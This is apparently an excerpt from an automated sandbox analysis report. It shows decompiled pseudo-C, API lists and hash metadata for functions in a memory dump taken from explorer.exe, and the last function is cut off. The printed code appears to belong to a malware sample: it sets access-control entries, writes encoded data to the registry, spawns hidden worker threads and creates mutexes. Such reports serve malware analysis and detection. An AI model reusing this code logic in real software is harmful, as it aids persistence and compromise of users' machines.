                            0x00082b43
                            0x00082b43
                            0x00082b44
                            0x00082b49
                            0x00082b4d
                            0x00082b63
                            0x00082b68
                            0x00082b6e
                            0x00082b71
                            0x00082b74
                            0x00082b74
                            0x00082b76
                            0x00082b77
                            0x00082b7a
                            0x00082b7d
                            0x00000000
                            0x00082b28
                            0x00000000

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcat
                            • String ID: %u;%u;%u
                            • API String ID: 3011335133-2973439046
                            • Opcode ID: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                            • Opcode Fuzzy Hash: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0xc2fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0xc2fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0xc2fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0xc2fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0xc2fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0xc2fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0xc2fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0xc2fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0xc2fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}






































                            0x0008bd1b
                            0x0008bd1e
                            0x0008bd26
                            0x0008bd2c
                            0x0008bd2f
                            0x0008bd34
                            0x0008bd3a
                            0x0008bd3b
                            0x0008bd3c
                            0x0008bd3d
                            0x0008bd3e
                            0x0008bd3f
                            0x0008bd40
                            0x0008bd41
                            0x0008bd44
                            0x0008bd47
                            0x0008bd49
                            0x0008bd4c
                            0x0008bd50
                            0x0008bd53
                            0x0008bd54
                            0x0008bd59
                            0x0008bd60
                            0x0008be54
                            0x0008be58
                            0x0008be5a
                            0x0008be62
                            0x0008be62
                            0x0008be69
                            0x0008be6b
                            0x0008be73
                            0x0008be73
                            0x0008be78
                            0x0008be7a
                            0x0008be80
                            0x0008be80
                            0x0008be87
                            0x0008be89
                            0x0008be91
                            0x0008be91
                            0x0008be95
                            0x0008be9a
                            0x0008be9a
                            0x0008bd6b
                            0x0008bd6e
                            0x0008bd75
                            0x0008bd76
                            0x0008bd7d
                            0x0008bd80
                            0x0008bd87
                            0x0008bd8a
                            0x0008bd95
                            0x0008bda0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008bda2
                            0x0008bda2
                            0x0008bda5
                            0x0008bda6
                            0x0008bda7
                            0x0008bda8
                            0x0008bda9
                            0x0008bdaa
                            0x0008bdab
                            0x0008bdac
                            0x0008bdae
                            0x0008bdaf
                            0x0008bdb3
                            0x0008bdb4
                            0x0008bdbe
                            0x00000000
                            0x0008bdc4
                            0x0008bdc4
                            0x0008bdc9
                            0x0008bdcb
                            0x0008bdcd
                            0x0008bdce
                            0x0008bdd5
                            0x0008bdd8
                            0x0008bddf
                            0x0008bde2
                            0x0008bde5
                            0x0008bde5
                            0x0008bde8
                            0x0008bdeb
                            0x0008bdec
                            0x0008bdf0
                            0x0008bdf1
                            0x0008bdf6
                            0x0008bdfc
                            0x00000000
                            0x00000000
                            0x0008be08
                            0x0008be0c
                            0x00000000
                            0x00000000
                            0x0008be0e
                            0x0008be14
                            0x0008be16
                            0x0008be1f
                            0x00000000
                            0x00000000
                            0x0008be21
                            0x0008be26
                            0x0008be27
                            0x0008be2a
                            0x0008be2c
                            0x0008be35
                            0x00000000
                            0x00000000
                            0x0008be3a
                            0x0008be3c
                            0x0008be44
                            0x0008be44
                            0x0008be47
                            0x0008be4f
                            0x00000000
                            0x0008be4f
                            0x0008bdbe

                            APIs
                            • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocEntriesLocal
                            • String ID:
                            • API String ID: 2146116654-0
                            • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                            • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A0AB, Relevance: 3.1, APIs: 2, Instructions: 146registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				intOrPtr _t84;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								_t84 =  *0x9e68c; // 0xc2fab8
								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}




























                            0x0008a0b8
                            0x0008a0bd
                            0x0008a0bf
                            0x0008a0c2
                            0x0008a231
                            0x0008a231
                            0x0008a231
                            0x00000000
                            0x0008a0d2
                            0x0008a0d2
                            0x0008a0d4
                            0x00000000
                            0x00000000
                            0x0008a0da
                            0x0008a0e3
                            0x0008a0e6
                            0x0008a0e7
                            0x0008a0ef
                            0x0008a0f2
                            0x0008a0fd
                            0x0008a10d
                            0x0008a112
                            0x0008a115
                            0x0008a11e
                            0x0008a126
                            0x0008a12b
                            0x0008a130
                            0x0008a13d
                            0x0008a13f
                            0x0008a146
                            0x0008a14b
                            0x0008a14e
                            0x0008a156
                            0x0008a163
                            0x0008a168
                            0x0008a16e
                            0x0008a177
                            0x0008a17d
                            0x0008a180
                            0x0008a181
                            0x0008a193
                            0x0008a1a3
                            0x0008a1af
                            0x0008a1b4
                            0x0008a1b7
                            0x0008a1b9
                            0x0008a1c3
                            0x0008a1de
                            0x0008a1e1
                            0x0008a1e3
                            0x0008a1fe
                            0x0008a201
                            0x0008a203
                            0x0008a205
                            0x0008a207
                            0x0008a207
                            0x0008a208
                            0x0008a210
                            0x0008a1e5
                            0x0008a1e5
                            0x0008a1e7
                            0x0008a1e7
                            0x0008a219
                            0x0008a21f
                            0x0008a226
                            0x00000000
                            0x0008a22d
                            0x0008a134
                            0x00000000
                            0x0008a134

                            APIs
                              • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapOpen_ftol2_sse
                            • String ID:
                            • API String ID: 3756893521-0
                            • Opcode ID: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                            • Opcode Fuzzy Hash: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1e0
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0xc0f8a0
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0xc0f8a0
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0xc0f8a0
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0xc0f8a0
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0xc0f8a0
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0xc0f8a0
									_t30 = _t83 + _t113 + 4; // 0xc0f8a4
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0xc0f8a0
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0xc0f8a0
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0xc0f8a0
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0xc0f8a0
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0xc2f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0xc0f8a0
										_t37 = _t61 + 0xc; // 0xc0f8ac
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0xc0f8a0
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1e0
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0xc0f8a0
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0xc0f8a0
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0xc0f8a0
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0xc2f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0xc0f8a0
							goto L7;
						}
						_t98 =  *0x9e770; // 0xc0f8a0
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0xc0f8a0
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}





































                            0x000898f1
                            0x000898f2
                            0x000898f3
                            0x000898fb
                            0x000898fe
                            0x00089905
                            0x0008990e
                            0x00089917
                            0x0008991e
                            0x00089920
                            0x00089922
                            0x00089922
                            0x00089927
                            0x0008994f
                            0x00089952
                            0x0008996c
                            0x00089972
                            0x000899b2
                            0x000899b6
                            0x000899bb
                            0x000899bf
                            0x000899bf
                            0x000899cb
                            0x000899cf
                            0x000899d7
                            0x000899dd
                            0x000899e2
                            0x000899e8
                            0x000899ec
                            0x000899f4
                            0x00089a06
                            0x00089a0b
                            0x00089a10
                            0x00089a13
                            0x00089a18
                            0x00089a1d
                            0x00089a59
                            0x00089a5f
                            0x00089a65
                            0x00089a6f
                            0x00089a74
                            0x00089a7a
                            0x00089a1f
                            0x00089a23
                            0x00089a28
                            0x00089a2b
                            0x00089a30
                            0x00089a33
                            0x00089a37
                            0x00089a3e
                            0x00089a43
                            0x00089a49
                            0x00089a51
                            0x00089a52
                            0x00089a52
                            0x00089a7c
                            0x00089a7c
                            0x00089a82
                            0x00089a88
                            0x00089a8b
                            0x00089a8d
                            0x00089a8d
                            0x00089974
                            0x00089978
                            0x0008997e
                            0x00089984
                            0x00089988
                            0x00089991
                            0x00000000
                            0x00000000
                            0x00089997
                            0x0008999b
                            0x000899a8
                            0x000899ad
                            0x00000000
                            0x000899ad
                            0x00000000
                            0x00089952
                            0x00089929
                            0x0008992e
                            0x0008992f
                            0x00089938
                            0x00089965
                            0x00000000
                            0x00089965
                            0x0008993a
                            0x00089945
                            0x0008994a
                            0x00000000
                            0x00089954
                            0x00089954
                            0x00089957
                            0x00089958
                            0x00000000
                            0x00089960
                            0x00089910
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                            • Opcode Fuzzy Hash: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 26%
                            			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0xc2f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E00088604(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}













                            0x0008a6ac
                            0x0008a6ad
                            0x0008a6ae
                            0x0008a6b2
                            0x0008a6b4
                            0x0008a6b9
                            0x0008a6c9
                            0x0008a6cd
                            0x0008a757
                            0x0008a757
                            0x0008a759
                            0x0008a75b
                            0x0008a75d
                            0x0008a75d
                            0x0008a6d3
                            0x0008a6e1
                            0x0008a6e5
                            0x0008a73d
                            0x0008a73d
                            0x0008a743
                            0x0008a748
                            0x0008a750
                            0x0008a756
                            0x00000000
                            0x0008a748
                            0x0008a6e7
                            0x0008a6f0
                            0x0008a6f2
                            0x0008a6f8
                            0x00000000
                            0x00000000
                            0x0008a6fc
                            0x0008a6ff
                            0x0008a700
                            0x0008a706
                            0x0008a707
                            0x0008a708
                            0x0008a72d
                            0x0008a70f
                            0x0008a761
                            0x00000000
                            0x00000000
                            0x0008a763
                            0x0008a766
                            0x0008a76c
                            0x0008a76e
                            0x0008a76e
                            0x0008a776
                            0x0008a779
                            0x00000000
                            0x0008a779
                            0x0008a717
                            0x0008a71a
                            0x0008a71e
                            0x0008a720
                            0x0008a723
                            0x0008a728
                            0x0008a72c
                            0x0008a72c
                            0x00000000
                            0x0008a72d
                            0x0008a6bb
                            0x00000000

                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                            • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,00C2FD20,00000400), ref: 0008A776
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleRead
                            • String ID:
                            • API String ID: 2331702139-0
                            • Opcode ID: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                            • Opcode Fuzzy Hash: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				char* _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							E0009E6F0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}










                            0x0008153e
                            0x00081545
                            0x0008154b
                            0x00081552
                            0x00081607
                            0x00081607
                            0x00081607
                            0x00081558
                            0x0008155b
                            0x00081561
                            0x00081568
                            0x00000000
                            0x0008156e
                            0x00081573
                            0x00081578
                            0x0008157d
                            0x00000000
                            0x00081583
                            0x0008158f
                            0x00081594
                            0x0008159e
                            0x000815a3
                            0x000815ab
                            0x000815b9
                            0x000815bf
                            0x000815c4
                            0x000815ca
                            0x000815cc
                            0x000815d2
                            0x000815d8
                            0x000815e4
                            0x000815ea
                            0x000815eb
                            0x000815f2
                            0x000815f8
                            0x000815fd
                            0x00081602
                            0x000815ce
                            0x000815ce
                            0x00000000
                            0x000815ce
                            0x000815ad
                            0x000815ad
                            0x000815af
                            0x000815af
                            0x000815af
                            0x000815ab
                            0x0008157d
                            0x00081568
                            0x0008160c

                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateMutex$AllocateHeap
                            • String ID:
                            • API String ID: 704353917-0
                            • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                            • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BC7A, Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                            Download Yara Rule
                            C-Code - Quality: 44%
                            			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x1fc
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
